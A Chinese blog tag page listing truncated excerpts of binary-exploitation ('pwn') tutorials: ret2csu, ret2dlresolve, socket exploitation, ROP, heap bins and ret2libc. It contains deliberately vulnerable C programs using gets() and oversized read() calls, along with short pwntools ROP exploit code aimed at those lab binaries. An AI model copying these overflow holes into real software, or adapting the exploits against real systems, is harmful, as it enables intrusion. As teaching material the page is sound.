包含标签 pwn 的文章

ret2csu

漏洞程序 #include <stdio.h> int win(int x, int y, int z) { if(z == 0xdeadbeefcafed00d) { puts("Awesome work!"); } } int main() { puts("Come on then, ret2csu me"); char input[30]; gets(input); return 0; } 利用分析 常规利用 溢出控制rip指向gadget gadget负责执行win 利用代码: from pwn import * elf = context.binary = ELF('./vuln') p = process() log.info(f'win addr is : {hex(elf.sym.win)}') offset = 40 rop = ROP(elf) rop.raw(offset * 'a') rop.win(0,0,0xdeadbeefcafed00d) p.recv() p.sendline(rop.chain()) result = p.recvline() log.info(result) 上述代码基于一个假设存在可以构建gadget的情况,但实际情……

阅读全文

ret2dlresolve

概要 利用ret2dlresolve,攻击者可以诱导二进制程序解析一个所选择的函数(比如system)为plt。 动态链接的ELF对象在第一次使用PLT和GOT调用时导入libc函数。在重定位runtime symbol,RIP将跳转到PLT并尝试解析该符号。在这个过程中,一个&quo……

阅读全文

socket exploitation

socket vuln #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> void vuln(int childfd) { char buffer[30]; read(childfd, buffer, 500); write(childfd, "Thanks!", 8); } void win() { system("/bin/sh"); } ////////////////////// Socket Stuff /* * error - wrapper for perror */ void error(char *msg) { perror(msg); exit(1); } int main(int argc, char **argv) { int parentfd; /* parent socket */ int childfd; /* child socket */ int portno; /* port to listen on */ int clientlen; /* byte size of client's address */ struct sockaddr_in serveraddr; /* server's addr */ struct sockaddr_in clientaddr; /* client addr */ struct hostent *hostp; /* client host info */ char *hostaddrp; /* dotted decimal host addr string */ int optval; /* flag value for setsockopt */ int n; /* message byte size */ /* * check……

阅读全文

ROP

ROP Returned-oriented Program,defeats the W⊕X protections recently deployed by Microsoft,Intel, and AMD;in this context, it can be seen as a generalization of traditional return-into-libc attacks. But the threat is more general . gadget what gadget Each gadget is an arrangement of words on the stack, both pointers to instruction sequences and immediate data words, that when invoked accomplishes some well-defined task “W⊕X,” ensures that no memory location in a process image is marked both writable (“W”) and executable (“X”) gadget feature One gadget might: perform a load operation another an xor and another a conditional branch 案例程序 from pwn import * context.arch = 'amd64' context.os = 'linux' elf = ELF.from_assembly( ''' mov rdi, 0; mov rsi, rsp; sub rsi, 8; mov rdx,……

阅读全文

heap: chunks and bins

chunks 在x86_64上chunk多加16字节的metadata,x86上多加8字节的meatadata metadata := prev size + size + flags(A,M,P) prev size: 前面相邻chunk被free,则代表前chunk大小 size:代表chunk大小 P(0x01): Previous in Use ,表示前面的chunk是否已分配在使用,P == 0,该chunk之前的chun……

阅读全文

ret2libc

ret2libc 程序开启nx保护时候,传统的shellcode在栈上不可执行,无法获取 执行shell程序,可以用ret2libc技术。 漏洞程序 #include <stdio.h> void vuln() { char buffer[64]; puts("Overflow me"); gets(buffer); } int main() { vuln(); } gcc vuln.c -o -m32 -fno-stack-protector -no-pie vuln-32 └─$ checksec --file=./vuln-32 [*] '/home/kali/exploits/ret2libc/vuln-32' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 利用方案 eip直接指向system(’/bin/……

阅读全文